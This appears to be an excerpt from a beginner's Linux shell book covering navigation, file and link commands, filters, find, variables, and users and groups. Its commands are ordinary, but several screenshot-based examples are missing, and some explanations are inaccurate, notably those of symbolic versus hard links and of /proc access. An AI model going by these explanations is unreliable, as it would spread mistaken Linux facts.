Sometimes on Linux, the names of programs and commands are too long. Fortunately, bash itself can complete the names. By pressing the Tab key, you can complete the name of a command, program, or directory. For example, suppose you want to use the bunzip2 decompression program. To do this, type:
bu
Then press Tab. If nothing happens, then there are several possible options for completing the command. Pressing the Tab key again will give you a list of names starting with bu. For example, suppose the system has the buildhash, builtin, and bunzip2 programs:
$ bu
buildhash builtin bunzip2

$ bu
Type n (bunzip2 is the only name whose third letter is n), and then press Tab. The shell will complete the name, and it remains only to press Enter to run the command!
Note that a program invoked from the command line is searched for by bash in the directories defined in the PATH system variable. By default, this directory list does not include the current directory, denoted ./ (dot slash). Therefore, to run the prog program from the current directory, you must issue the command ./prog.
Basic commands
The first tasks that have to be solved in any system are working with data (usually stored in files) and managing the programs (processes) running on the system. Below are the commands that allow you to perform the most important operations on files and processes. Only the first of them, cd, is part of the shell itself; the rest are distributed separately but are always available on any Linux system. All the commands below can be run both in the text console and in graphical mode (xterm, KDE console). For more information on each command, use the man command, for example: man ls.
cd
Allows you to change the current directory (to navigate through the file system). It works with both absolute and relative paths. Suppose you are in your home directory and want to go to its tmp/ subdirectory. To do this, enter the relative path:
cd tmp/
To change to the /usr/bin directory, type the absolute path:
cd /usr/bin/
Some options for using the command are:
cd ..
Allows you to move to the parent directory (note the space between cd and ..).

cd -
Allows you to return to the previous directory. The cd command with no parameters returns the shell to the home directory.
ls
ls (list) lists the files in the current directory. Two main options: -a shows all files, including hidden ones; -l displays more detailed information.
rm
This command is used to delete files. Warning: once you delete a file, you cannot restore it! Syntax: rm filename. This program has several parameters. The most frequently used ones are: -i, request confirmation before each deletion, and -r, recursive deletion (i.e., deletion including subdirectories and hidden files). Example:
rm -i ~/html/*.html
Removes all .html files in your html directory, asking for confirmation on each.
mkdir, rmdir
The mkdir command allows you to create a directory, while rmdir deletes a directory, provided it is empty. Syntax: mkdir dir_name; rmdir dir_name. The rmdir command is often replaced by the rm -rf command, which allows you to delete directories even if they are not empty.
less
less allows you to view a file page by page. Syntax: less filename. It is useful to review a file before editing it; the main use of this command is as the final link in a chain of programs that outputs a significant amount of text, which would not fit on one screen and would otherwise flash past too quickly. To exit less, press q (quit).
grep

This command allows you to find a string of characters in a file. Please note that grep searches by a regular expression, that is, it provides the ability to specify a pattern for searching a whole class of strings at once. In the language of regular expressions, it is possible to make patterns describing, for example, the class of strings "four digits in a row, surrounded by spaces". Obviously, such an expression can be used to search a text for all the years written in digits. The search capabilities of regular expressions are very wide. For more information, you can refer to the on-screen documentation on grep (man grep). Syntax: grep pattern filename.
ps
Displays a list of current processes. The command column indicates the process name; the PID (process identifier) column gives the process number, used for operations on the process, for example, sending signals with the kill command. Syntax: ps arguments. The argument u gives you more information; ax allows you to view processes that do not belong to you.
kill
If a program stops responding or hangs, use this command to terminate it. Syntax: kill PID_number. The PID_number here is the process identification number; you can find out the process number of each running program using the ps command. Normally, the kill command sends a normal termination signal to the process, but sometimes this does not work, and you will need to use kill -9 PID_number. In this case, the command is immediately terminated by the system without the possibility of saving data (abnormal termination). The list of signals that the kill command can send to a process can be obtained by issuing the command kill -l.
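A sketch tying grep, ps, and kill together; the sleep process below is started only so there is something safe to find and terminate:

```shell
# Search a file for a pattern: print the /etc/passwd lines containing "root".
grep root /etc/passwd

# Start a harmless background process so ps and kill have a target.
sleep 300 &
pid=$!          # the shell records the PID of the last background job

# Confirm the process is running, then terminate it by PID.
ps ax | grep "[s]leep 300"
kill "$pid"
```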

File and Directory Operations
Here we consider utilities that work with file-system objects: files, directories, devices, and file systems as a whole.
cp Copies files and directories.
mv Moves (renames) files.
rm Removes files and directories.
df Displays a report on disk-space usage (free space on all disks).
du Calculates the disk space occupied by files or directories.
ln Creates links to files.
ls Lists files in a directory; supports several different output formats.
mkdir Creates directories.
touch Changes file timestamps (last modified, last accessed); can be used to create empty files.
realpath Calculates the absolute file name from a relative one.
basename Removes the path from a full file name (i.e., shortens an absolute file name to a relative one).
dirname

Removes the file name from the full file name (that is, it displays the name of the directory where the file is located).
pwd Displays the name of the current directory.
Filters
Filters are programs that read data from standard input, transform it, and write it to standard output. Using filter programs allows you to organize a pipeline: to perform several sequential operations on data in a single command. More information about standard I/O redirection and the pipeline can be found in the documentation for bash or another command shell. Many of the commands listed in this section can also work with files.
cat concatenates files and writes them to standard output;
tac concatenates files and writes them to standard output, starting from the end;
sort sorts lines;
uniq removes duplicate lines from sorted files;
tr replaces certain characters on standard input with other specified characters on standard output; it can be used for transliteration, deletion of extra characters, and more complex substitutions;
cut displays a specified part of each line of a file; systematized data in text format can be processed with cut, which can output only specified fields (data from certain columns of a table whose cells are separated by a standard character, a tab or any other) as well as characters standing at a certain position in a line;

paste combines data from several files into one table, in which the data from each source file forms a separate column;
csplit divides a file into parts according to a template;
expand converts tabs to spaces;
unexpand converts spaces to tabs;
fmt formats text to a given width;
fold wraps lines that are too long onto the next line;
nl numbers the lines of a file;
od displays a file in octal, hexadecimal, and other similar forms;
tee duplicates the standard output of a program into a file on disk.
Other commands
head displays the initial part of a file, of a specified size;
tail outputs the final part of a file of a given size; since it can output data as it is appended to the end of the file, it is used to track log files, etc.;
echo displays the text of its argument on standard output;

false does nothing and exits with return code 1 (error); it can be used in shell scripts where an unsuccessful command is needed;
true does nothing and exits with return code 0 (successful completion); it can be used in scripts where a successful command is required;
yes prints the same line (by default, y) endlessly until it is interrupted;
seq prints a series of numbers in a given range, successively increasing or decreasing by a specified amount;
sleep suspends execution for a specified number of seconds;
usleep suspends execution for a specified number of microseconds;
comm compares two pre-sorted (by the sort command) files line by line and displays a table of three columns: in the first are lines unique to the first file, in the second lines unique to the second, and in the third lines common to both files;
join combines the lines of two files on a common field: for each pair of input lines with identical common fields, a line is written to standard output; by default the first field is taken as the common one, and fields are separated by whitespace;
split splits a file into pieces of a given size.
Calculations
In addition to simple operations with strings (input/output and merging), it is

often necessary to perform some calculations on the available data. Listed below are utilities that perform calculations on numbers, dates and strings.
test returns true or false depending on the value of its arguments; the test command is useful in scripts for checking conditions;
date displays and sets the system date and, in addition, can be used for calculations on dates;
expr evaluates expressions;
md5sum calculates a checksum using the MD5 algorithm;
sha1sum calculates a checksum using the SHA1 algorithm;
wc counts the number of lines, words and characters in a file;
factor decomposes numbers into prime factors.

Search
Searching for information in the file system can be divided into searching by file attributes (understood broadly, that is, including the name, path, etc.) and searching by content. For these types of search, the programs find and grep are usually used, respectively. Thanks to convenient interprocess communication tools, these two types of search are easy to combine, that is, to search for the necessary information only in files with the necessary attributes.

Attribute search

The main search tool for file attributes is the find program. A generalized call to find looks like this: find path expression, where path is a list of directories in which to search, and expression is a set of expressions that describe the criteria for selecting files and the actions to be performed on the files found. By default, the names of found files are simply output to standard output, but this can be overridden and the list of names of found files can be transferred to any command for processing. By default, find searches in all subdirectories of directories specified in the path list.
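The "find path expression" form above can be sketched on a small throwaway tree (the directory and file names are invented for this demo):

```shell
# Set up a tiny directory tree to search in.
mkdir -p /tmp/find_demo/sub
touch /tmp/find_demo/a.txt /tmp/find_demo/sub/b.txt /tmp/find_demo/c.log

# path = /tmp/find_demo, expression = -name '*.txt' -type f
find /tmp/find_demo -name '*.txt' -type f

rm -r /tmp/find_demo
```

Both a.txt and sub/b.txt are printed, because by default find descends into all subdirectories of the directories given in the path list.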

Expressions
Expressions that define file search criteria consist of key-value pairs. Some of the possible search options are listed below:
-amin, -anewer, -atime The time of last access to the file. Allows you to find files that were opened within a certain period or, conversely, files that nobody has accessed for a certain period.
-cmin, -cnewer, -ctime The time the file was last changed.
-fstype The type of file system on which the file is located.
-uid, -user, -gid, -group The user and group that own the file.
-name, -iname Match the file name against the specified pattern (-iname is case-insensitive).
-regex, -iregex Match the file name against a regular expression.
-path, -ipath Match the full file name (with the path) against the specified pattern.
-perm

Access rights.
-size File size.
-type File type.

Actions
The find program can perform various actions on the files it finds. The most important of them are:
-print Output the file name to standard output (the default action);
-delete Delete the file;
-exec Execute a command, passing the file name as a parameter.
You can read about the rest in the on-screen documentation for find, by issuing the man find command.

Options
Options affect the overall behavior of find. The most important of them are:
-maxdepth Maximum search depth in subdirectories;
-mindepth Minimum search depth in subdirectories;
-xdev Search only within the same file system.
You can read about the rest in the on-screen documentation for the find command.
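Combining the two kinds of search mentioned earlier is straightforward: find restricts the candidate files by attribute and hands them to grep for the content search. A self-contained sketch (the file names and the "needle" string are invented):

```shell
mkdir -p /tmp/srch
echo 'needle'   > /tmp/srch/a.conf
echo 'haystack' > /tmp/srch/b.conf
echo 'needle'   > /tmp/srch/c.log

# Only .conf files are handed to grep; -l prints just the names of matching files.
find /tmp/srch -maxdepth 1 -name '*.conf' -exec grep -l needle {} +

rm -r /tmp/srch
```

c.log contains the search string but is never examined, because it fails the attribute test.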

Terminals
The terminal in Linux is a program that gives the user the ability to communicate with the system through a command line interface. Terminals transfer only text data to and from the system. A standard terminal is available on any textual virtual console; to access the command line from a graphical shell, special programs are needed: terminal emulators. Listed below are some of the terminal emulators and similar programs included in the ALT Linux 2.4 Master distribution.

xterm Programs: resize, uxterm, xterm. The standard terminal emulator for the X Window System. This emulator is compatible with DEC VT102/VT220 and Tektronix 4014 terminals and is designed for programs that do not use the graphical environment directly. If the operating system supports notification of terminal window changes (for example, the SIGWINCH signal on systems derived from 4.3BSD), xterm can inform the programs running in it that the window size has changed.

aterm Aterm is a color terminal emulator based on rxvt version 2.4.8, supplemented with NeXT-style scroll bars by Alfredo Kojima. It is intended to replace xterm if you do not need Tektronix 4014 terminal emulation.

console-tools Programs: charset, chvt, codepage, consolechars, convkeys, deallocvt, dumpkeys, fgconsole, setkeycodes, setleds, setmetamode, setvesablank, showcfont, showkey, splitfont, unicode_stop, vcstime, vt-is-UTF8, writevt. This package contains tools for loading console fonts and keyboard layouts. It also includes a variety of fonts and layouts. When installed, its tools are used during boot/login to establish the system and personal configuration of the console.

screen The screen utility allows you to execute console programs when you cannot control their execution all the time (for example, if you are limited to session

access to a remote machine). For example, you can run multiple interactive tasks on a single physical terminal (a remote access session) by switching between virtual terminals with a screen instance installed on the remote machine. The program can also be used to run programs that do not require a direct connection to a physical terminal. Install the screen package if you may need virtual terminals.

vlock The vlock program allows you to lock input when working in the console. Vlock can lock the current terminal (local or remote) or the entire system of virtual consoles, which completely blocks access to all consoles. Unlocking occurs only after successful authentication of the user who initiated the lock.

Chapter 8 Basic Linux Shell Commands

Introduction
We are now going to look at some useful commands for file handling and similar uses. Before going into more detail, let's look at the Linux file structure. Linux stores files in a structure known as the virtual directory structure. This is a single directory structure that incorporates all the storage devices into a single tree. Each storage device is treated as a file. If you examine the path of a file, you do not see any disk information. For instance, the path to my desktop is /home/jan/Desktop, which reveals nothing about the disk it lives on. This way, you do not need to know the underlying architecture. If you want to add another disk to the existing tree, you simply use mount point directories to do so. Everything is connected to the root. The naming of these directories is based on the FHS (Filesystem Hierarchy Standard). Let's look at the common directories once more. We already went through the directory types during the installation.

Table: Linux directory types

/        The root directory. The upper-most level.
/bin     The binary store. GNU user-level utilities live in this directory.
/boot    Where the system stores the boot directory and files used during the boot process.
/dev     Device directory and nodes.
/etc     Where the system stores the configuration files.
/home    Home of user directories.
/lib     System and application libraries.
/media   Where media such as CDs and USB drives is mounted.
/mnt     Where removable media is mounted to.
/opt     Optional software packages are stored here.
/proc    Process information – not open for users.
/root    Home directory of root.
/run     Runtime data is stored here.
/sbin    System binary store. Administrative utilities are stored here.
/srv     Local services store their files here.
/sys     System hardware information is stored here.
/tmp     The place for temporary files.
/usr     Where user-installed software is stored.
/var     Variable directory, where dynamic files such as logs are stored.

Directory and File Navigation
To view a list of directories in the present directory, in Windows you use the dir command. This command works the same way on Linux. The most basic way to navigate to a file is to use its full path, such as /home/jan/Desktop/. There are basic commands that make this easier.
1. Find your present working directory with the pwd command.

Change the directory location using the cd command. Here we use the absolute path.

2. Get back to the home directory using the cd command only.

Now we will use the relative path to make things easier and less time-consuming. In this case, we do not need to start the path from '/'.

Here, the dir command lists the directories under my current folder. I could jump to the Desktop folder using the command cd Desktop. There are 2 special characters when it comes to directory traversal: '.' and '..'. A single dot represents the current directory. Double dots represent the parent folder.
5. To go back one level up, use '..', for instance

6. You can also use ‘..’ to skip typing folder paths. For instance, 7. You can go back one level and go forward. Here, you go up to the home folder and then go forward (down) to the Music folder.

8. You can do the ‘../’ in a chain to go to a folder in an upper level, back and forth using absolute path (mixing relative and absolute paths).

Listing Files
We use the ls command to list files. This is one of the most popular commands among Linux users. Below is a list of ls options and their uses.

ls -a       List all files, including hidden files starting with '.'
ls --color  Colored list [=always/never/auto]
ls -d       List the directories themselves (used with '*/' to list only directories)
ls -F       Append an indicator to entries (one of */=>@|)
ls -i       List the inode index
ls -l       List in long format, including permissions
ls -la      Same as above, with hidden files
ls -lh      Long list in human-readable format
ls -ls      Long list with file size
ls -r       List in reverse order
ls -R       List recursively (the directory tree)
ls -s       List file size
ls -S       Sort by size
ls -t       Sort by date/time
ls -X       Sort by extension name

Let’s examine a few commands. Remember, you can use more than one argument. E.g., ls -la Syntax: ls [option ...] [file]... Detailed syntax: ls [-a | --all] [-A | --almost-all] [--author] [-b | --escape] [--block-size=size] [-B | --ignore-backups] [-c] [-C] [--color[=when]] [-d | --directory] [-D | --dired] [-f] [-F | --classify] [--file-type] [--format=word] [--full-time] [-g] [--group-directories-first]

[-G | --no-group] [-h | --human-readable] [--si] [-H | --dereference-command-line] [--dereference-command-line-symlinkto-dir] [--hide=pattern] [--indicator-style=word] [-i | --inode] [-I | --ignore=pattern] [-k | --kibibytes] [-l] [-L | --dereference] [-m] [-n | --numeric-uid-gid] [-N | --literal] [-o] [-p | --indicator-style=slash] [-q | --hide-control-chars] [--show-control-chars] [-Q | --quote-name] [--quoting-style=word] [-r | --reverse] [-R | --recursive] [-s | --size] [-S] [--sort=word] [--time=word] [--time-style=style] [-t] [-T | --tabsize=cols] [-u] [-U] [-v] [-w | --width=cols] [-x] [-X] [-Z | --context] [-1] Example: ls -l setup.py

This gives long-list-style details for this specific file.

More examples
List the content of your home directory: ls
List the contents of your subdirectories: ls */
Display the directories of the current directory: ls -d */
List the content of root: ls /
List the files with the following extensions: ls *.{htm,sh,py}
List the details of a file and, if it is not found, suppress the error: ls -l myfile.txt 2>/dev/null

A word on /dev/null
/dev/null is an important location. It is actually a special file called the null device. There are other names for it, such as blackhole or bit-bucket. When something is written to this file, it is immediately discarded and an end-of-file (EOF) is returned. When a process or a command raises an error, STDERR (the standard error) is the default file descriptor the process writes it to. These errors will be displayed on screen. If someone wants to suppress them, that is where the null

device becomes handy. We often write this command line as > /dev/null 2>&1. For instance,
ls -l > /dev/null 2>&1
What do the 2 and &1 mean? The file descriptor for standard input (stdin) is 0. For standard output (stdout), it is 1. For standard error (stderr), it is 2. Here, 2>&1 redirects stderr to wherever stdout points, which is /dev/null, so any error generated by the ls command is discarded immediately.

ls Color Codes

ls color codes These color codes distinguish the file types quite well Let’s run ls -lasSt

This uses a long list format, displays all files, sorts by time. Now, you need to understand what these values are.

1. 4: the file size (the S option sorts by size).
2. In the next section, d marks a directory.
3. The next few characters represent permissions (r = read, w = write, x = execute).
4. The number of hard links.
5. The file owner.
6. The file owner's group.
7. The size in bytes.
8. The last-modified time (which -t sorts by).
9. The file or directory name.
If you use -i in the command (with S removed, so the listing is sorted by last-modified time), you see the inodes in the left-most column.

Example: ls -laxo

Using ls for Pattern Matching The ls command can be used in conjunction with wildcards such as ‘*’ and ‘?’ Here the ‘*’ represents multiple characters and ‘?’ represents a single character. In this example, we have the following folder with the following directories and files.

We are trying to find a file with the name vm* (vm plus any characters to the right). Then we will try to match the file name INSTALL. The first attempt fails because there are only 4 '?'s; the next one succeeds.

We will now use the or logic to match a pattern.

Image: Folders in my directory Let’s see if we can only list the directories with the characters a and i in the middle.
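Since the original screenshots are not reproduced here, a self-contained sketch of this kind of pattern matching follows (the directory and file names are invented for the demo):

```shell
mkdir -p /tmp/glob_demo && cd /tmp/glob_demo
mkdir main mail raid rock
touch vmlinuz INSTALL

ls vm*          # '*' matches any run of characters: vmlinuz
ls -d ?a??      # each '?' matches exactly one character: mail main raid
ls -d *[ai]*    # '[ai]' matches a single 'a' or 'i' anywhere in the name

cd / && rm -r /tmp/glob_demo
```

Note that rock is excluded by both of the last two patterns: it has no 'a' in the second position and contains neither 'a' nor 'i'.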

Another example using pipes: ls -la | less

Handling Files In this section, we will create, modify, copy, move and delete files. You will also learn how to read files and do other tasks. Creating a File To create files and to do some more tasks we use the command touch. touch test.txt

Syntax: touch [OPTION]... FILE... Detailed syntax: touch [[-a] [-m] | [--time=timetype] [...]] [[-d datestring] | [-t timestamp]] [-c] [-f] [-h] [-r reffile] file [file ...] This command can also be used to change the file access time of a file.

To change only the last access time, use -a. Example: touch -a test1.txt

Here, to view the output you use the --time parameter in the ls command. With

only the ls -l it does not display the last access time but the last modified time. Copying Files To copy files, use the cp command. Syntax: cp [option]... [-T] source destination Example: cp test1.txt test2.txt

The copy command can be dangerous, as it does not ask whether test2.txt already exists. This can lead to data loss. Therefore, always use the -i option.

You can answer with y or n to accept or deny. Copying a file to another directory: cp test1.txt /home/jan/Documents

Using the relative path instead of the absolute path. I am now in the directory /home/jan/Desktop and I want to copy a file to /home/jan/Documents. Command: cp test1.txt ../Documents

Copy a file to the present working directory using the relative path. Here we will use ‘.’ to denote the pwd.

Recursively copy files and folders. Example: cp -R snapt snipt copies the folder snapt, with its files, to snipt.

Let’s copy a set of files recursively from one directory to its sub directory. Command: cp -R ./Y/snapt/test* ./Y/snopt

This is my desktop. I have these files in the Y directory on Desktop. I want to copy test1.txt and test2.txt from Y to snopt directory. After executing the command,

How to use wildcards? We already used it in this example, haven’t we?

Linking Files with Hard and Symbolic Links
Another feature of the Linux file system is the ability to link files. Instead of maintaining original copies of files everywhere, you can link files to keep virtual copies of the same file. You can think of a link as a placeholder. There are 2 types of links:

- Symbolic links
- Hard links

A symbolic link is a separate physical file; it is not a shortcut. This file is linked to another file in the file system. Unlike a shortcut, the symlink gets instant access to the data object. Syntax: ln -s [OPTIONS] FILE LINK

Example: ln -s ./Y/test1.txt testn.txt

If you check the inodes, you will see that these are different files; the sizes show the same difference.

279185 test1.txt
1201056 testn.txt

When you create symlinks, the destination file should not already exist (in particular, a directory with the destination symlink name should not exist). However, you can force the command to create or replace the file.

The ln command is also valid for directories.

If you wish to overwrite symlinks, you have to use -f as stated above. If instead you want to repoint the symlink from one file to another, use -n. Example: I have 2 directories, dir1 and dir2, on my desktop. I create a symlink sym to dir1. Then I want to link sym to dir2 instead. Using -s and -f together (-sf) does not work; the option to use here is -n.
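A sketch of that repointing behaviour (the directory names are invented; readlink just shows where a symlink points):

```shell
mkdir -p /tmp/sym_demo/dir1 /tmp/sym_demo/dir2
cd /tmp/sym_demo

ln -s dir1 sym        # sym now points at dir1
readlink sym          # prints: dir1

# -f alone would follow sym into the dir1 directory and create the
# new link inside it; -n treats the existing symlink itself as the
# thing to replace.
ln -sfn dir2 sym
readlink sym          # prints: dir2

cd / && rm -r /tmp/sym_demo
```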

Unlinking
To remove symlinks you can use either of the following commands:

Syntax: unlink linkname
Syntax: rm linkname

Creating Hard Links

Now we will look at creating hard links. Hard link creates a separate virtual file. This file includes information about the original file and its location. Example: ln test1.txt hard_link

Here we do not see any symbolic representations. That means the file is an actual physical file. And if you look at the inode, you will see both files having the same inode number.
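The inode and link-count behaviour can be verified directly (the file names are invented; stat -c is the GNU coreutils form of the command):

```shell
cd /tmp
echo 'some data' > orig.txt
ln orig.txt hard.txt          # hard link: same inode, same data

ls -i orig.txt hard.txt       # both lines show the same inode number
stat -c '%h %n' orig.txt      # %h is the hard-link count, now 2

ln -s orig.txt soft.txt       # a symlink does NOT raise the count
stat -c '%h %n' orig.txt      # still 2

rm orig.txt hard.txt soft.txt
```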

How do we identify a hard link? Usually, the number of links connected to a file is 1; in other words, just the file itself. If the number is 2, the file has a connection to another file. Another example,

A symbolic link does not increment the hard-link count of a file. See the following example.

What happens if the original file is removed?

Now here you can see that the link count of hard_link has been reduced to 1. The

symbolic link displays a broken, or what we call an orphan, state.

File Renaming Next, we will look at how file renaming works. For this the command used is mv. mv stands for “move”. Syntax: mv [options] source dest Example: mv LICENSE LICENSE_1 You must be cautious when you use this command. If you do the following, what would happen?

One advantage of this command is that you can move and rename the file all at once, especially when moving from one location to another. Example: Moving /home/jan/Desktop/Y/snapt to the Desktop while renaming it to Snap. This is similar to a cut and paste on Windows, except for the renaming part. Example: mv /home/jan/Desktop/Y/snapt/ ./Snap

Removing Files To remove files, use rm command. rm command does not ask you if you want to delete the file. Therefore, you must use the -i option with it. Syntax: rm [OPTION]... FILE...

Managing Directories There is a set of commands to create and remove directories. To create a directory, use the mkdir command. To remove a directory, use the rmdir command. Syntax: mkdir [-m=mode] [-p] [-v] [-Z=context] directory [directory ...] rmdir [-p] [-v | –verbose] [–ignore-fail-on-non-empty] [directories …] Example: Creating a set of directories with the mkdir command. To create a tree of directories you must use -p. If you try without it, you won’t succeed.

Command: mkdir -p ./Dir1/Dir1_Child1/Child1_Child2 Example: rmdir ./Dir1/Dir1_Child1/Child1_Child2 To remove a directory with the rmdir command is not possible if the directory has files in it.

You have to remove the files first in order to remove the directory. In this case, you can use another command to do this recursively. Example: rm -rf /Temp

Managing File Content
File content management is extremely useful for day-to-day work. You can use several commands to view and manage content. Let's look at the file command first. It helps us peek into a file and see what it actually is. It can do more:

- It provides an overview of the file.
- It tells you if the file is a directory.
- It tells you if the file is a symbolic link.
- It can display file properties, especially for binary executables (a secure operation).
- It may brief you about the content (i.e., when executed against a script file).

Syntax: file [option] [filename]

Viewing Files with cat Command To view files, you cannot use the file command. You can use a more versatile command known as cat. Syntax: cat [OPTION] [FILE]... This command is an excellent tool to view a certain file or files at once, parts of the files and especially logs. Example: cat test.txt

Example: Viewing 2 files together. Command: cat test.txt testx.txt

Creating files with cat is also possible. The following command can create a file. Example: cat >testy

The cat command can be used with 2 familiar commands we used earlier. The less and more commands. Example: cat test.txt | more

Example: cat test.txt | less

Example: Displaying a line number with cat. Command: cat -n testx.txt

Overwriting Files with cat - You can use the redirection (standard output) operator (>). The following command will overwrite the text file. This is a useful tool, but you have to use it with caution. It can also be performed on multiple files to obtain a single file. Example: cat test.txt > testx.txt
Appending file content with cat without overwriting – Since the previous command overwrites its target, it cannot be used if you want to append content from one file to another; use >> instead. Example: cat testx.txt >> testy.txt

Example: Using standard input with cat. Command: cat < testy
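Putting the redirection operators from this section together in one self-contained run (the file names are invented):

```shell
cd /tmp
printf 'line one\n' > demo.txt        # > creates or overwrites the file
printf 'line two\n' >> demo.txt       # >> appends to it
cat -n demo.txt                        # numbered output of both lines
cat < demo.txt                         # feed the file to cat via standard input
cat demo.txt missing.txt 2>/dev/null   # the error about missing.txt is discarded
rm demo.txt
```

The last line ties back to /dev/null from earlier: cat still prints demo.txt on stdout, while the stderr complaint about the nonexistent file is silently dropped.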

Using the head and tail Commands
By default, the head command displays the first 10 lines of a file and the tail command displays the last 10 lines.
Examples:

- head testy
- tail testy
- head -2 testy
- tail -2 testy
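head and tail can also be chained through a pipe to pull lines out of the middle of a file, a trick worth knowing (the file here is generated with seq so the sketch is self-contained):

```shell
seq 1 10 > /tmp/nums.txt

head /tmp/nums.txt                # first 10 lines (here: the whole file)
tail -2 /tmp/nums.txt             # last two lines: 9 and 10
head -5 /tmp/nums.txt | tail -2   # lines 4 and 5: take the first five, keep the last two

rm /tmp/nums.txt
```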

Chapter 9 Variables

The echo command is used to print out the values stored inside variables. In Linux, creating a variable is very easy. For example, in order to store the name John in a variable called name, you can do something similar to what is shown below:

[root@host ~]# name="John"

The double quotation marks tell Linux that you are creating a variable that holds the string value John. If your string contains only one word, then you can omit the quotation marks, but if you are storing a phrase that contains more than one word and whitespace, then you must use the double quotation marks. To see the value inside any variable, you have to use the dollar sign ($) before the name of the variable in the echo command, like this:

[root@host ~]# echo $name
John

If you omit the dollar sign ($), echo will treat the argument passed to it as a string and will print that string, for example:

[root@host ~]# echo name
name

You should keep in mind that there should not be any whitespace between the identifier of the variable and its value. An identifier is basically the name or signature of a variable:

[root@host ~]# x=5 # This syntax is correct because there is no whitespace
[root@host ~]# x = 10 # This syntax is incorrect because there is whitespace between the variable name and its value

If you want to store some value inside a file while using the echo command, you could do something like this:

[root@host NewFolder]# echo name > new.txt
[root@host NewFolder]# cat new.txt
name

In the example above, I am storing the string name into a file that I created. After storing the text in the file, I printed it on the terminal and got exactly what I stored in the text file. In the following set of commands, I am using the double >> sign to append new text to the existing file.

[root@host NewFolder]# echo "is something that people use to recognize you!" >> new.txt
[root@host NewFolder]# cat new.txt
name is something that people use to recognize you!

You can also create and print two variables with a single line of command each, respectively. Example:

[root@host ~]# x=1; y=2
[root@host ~]# echo -e "$x\t$y"
1	2
[root@host ~]# echo -e "$x\n$y"
1
2

The flag -e tells Linux that I am going to use an escape character while printing the values of my variables. The first echo command in the example above contains the \t escape character, which inserts a tab between the printed values. The second echo command contains the newline escape character \n, which prints the two values on separate lines, as shown above. There are other escape sequences in the Linux terminal as well. For example, in order to print a backslash as part of your string value, you must use a double backslash in your echo command:

[root@host ~]# echo -e "$x\\$y"
1\2

There are other variables present in Linux too; these variables store some

values that come in handy while using any distribution of Linux. These predefined variables are often referred to as global variables. For example, $HOME is one of those global variables. The $HOME variable stores the path of our default directory, which in our case is the root user's home folder. We can see the path stored in $HOME using the echo command:

[root@host ~]# echo $HOME
/root

We can also change the values of these global variables, using the same method I used to store a value in a newly created variable. For now, I would ask you not to try that, as such things only concern expert Linux users, which you are not right now, but soon will be. Other global variables are:
1. PATH
2. PS1
3. TMPDIR
4. EDITOR
5. DISPLAY
Try echoing their values, but don't change them, as that will affect the workings of your Linux installation:

[root@host ~]# echo $PS1
[\u@\h \W]\$
[root@host ~]# echo $EDITOR
[root@host ~]# echo $DISPLAY
:1
[root@host ~]# echo $TMPDIR

The most important global variable of all is $PATH. The $PATH variable contains the directories/locations of all the programs that you can use from any directory. $PATH is similar to the environment variables present in the Windows operating system: both hold the directory paths to programs. Let's print the $PATH variable. Our outputs might differ, so

don’t worry if you see something different: Example: [[email protected] ~]# echo $PATH

Output: /usr/local/sbin:/usr/local/bin:/usr/bin:/usr/bin/site_perl:/usr/bin/vendor_perl:/usr/bin/core_perl

The output of the example above shows the paths where Linux can find files related to site_perl, vendor_perl or core_perl. You can add values to the path variable too. But again, at this stage you shouldn't change any value present in the $PATH variable. If you want to see where the commands that you use reside in the directory structure of Linux, you should use the which command. It will print out the directory from which Linux is getting the definition of the command passed. Example:

[root@host ~]# which ls
/usr/bin/ls
[root@host ~]# which pwd
/usr/bin/pwd
[root@host ~]# which cd

which: no cd in (/usr/local/sbin:/usr/local/bin:/usr/bin:/usr/bin/site_perl:/usr/bin/vendor_perl:/usr/bin/core_perl)
[root@host ~]# which mv
/usr/bin/mv
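which finds nothing for cd because cd is a shell built-in rather than a program on $PATH. A quick way to confirm the distinction is with the shell's type command:

```shell
type cd                     # reports that cd is a shell builtin
type ls                     # reports /usr/bin/ls (or an alias, depending on your shell setup)
echo "$PATH" | tr ':' '\n'  # print the search directories one per line
```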

Chapter 10 User and Group Management

In this chapter, we will learn about users and groups in Linux, how to manage them, and how to administer password policies for these users. By the end of this chapter, you will be well versed in the role of users and groups on a Linux system and how they are interpreted by the operating system. You will learn to create, modify, lock and delete user and group accounts that have been created locally. You will also learn how to manually lock accounts by enforcing a password-aging policy in the shadow password file.

Users and Groups
In this section, we will understand what users and groups are and what their association with the operating system is.

Who is a user?
Every process or running program on the operating system runs as a user. The ownership of every file lies with a user in the system. A user restricts access to a file or a directory. Hence, if a process is running as a user, that user determines the files and directories the process has access to.

You can learn about the currently logged-in user using the id command. If you pass another user as an argument to the id command, you can retrieve basic information about that other user as well. If you want to know the user associated with a file or a directory, you can use the ls -l command; the third column in the output shows the username. You can also view information related to a process by using the ps command. The default output of this command shows processes running only in the current shell. If you use the a option with the ps command, you will see all the processes across the terminal. If you wish to know the user associated with a process, pass the u option to ps as well; the first column of the output will show the user.

The outputs that we have discussed show users by name, but the system uses a user ID called a UID to track users internally. The usernames are mapped to these numbers using a database in the system.
There is a flat file stored at /etc/passwd, which stores the information of all users. There are seven fields for every user in this file.

username:password:UID:GID:GECOS:/home/dir:shell

username: The mapping of the user ID (UID) to a name, so that humans can remember it better
password: The field where users' passwords used to be saved in the past; they are now stored in a different file, located at /etc/shadow
UID: The numeric user ID, used by the system to identify the user at the most fundamental level
GID: The primary group number of the user. We will discuss groups in a while
GECOS: An arbitrary text field, which usually holds the full name of the user
/home/dir: The location of the user's home directory, where the user keeps personal data and other configuration files
shell: The program that runs after the user logs in. For a regular user, this will mostly be the program that gives the user the command line prompt

What is a group?
Just like users, groups have names and group ID (GID) numbers associated with them. Local group information can be found in /etc/group. There are two types of groups: primary and supplementary. Let's understand the features of each, one by one.

Primary Group:
There is exactly one primary group for every user
The primary group of a local user is defined by the fourth field in the /etc/passwd file, where the group number GID is listed

New files created by the user are owned by the primary group
The primary group of a user by default has the same name as that of the user. This is a User Private Group (UPG), and the user is the only member of this group

Supplementary Group:
A user can be a member of zero or more supplementary groups
For local groups, the membership of a user is identified by a comma-separated list of users, which is located in the last field of the group's entry in /etc/group

groupname:password:GID:list,of,users,in,this,group

The concept of supplementary groups is in place so that users can be part of more groups and, in turn, have access to resources and services that belong to other groups in the system

Getting Superuser Access
In this section, we will learn what the root user is and how you can become the root or superuser and gain full access over the system.

The root user
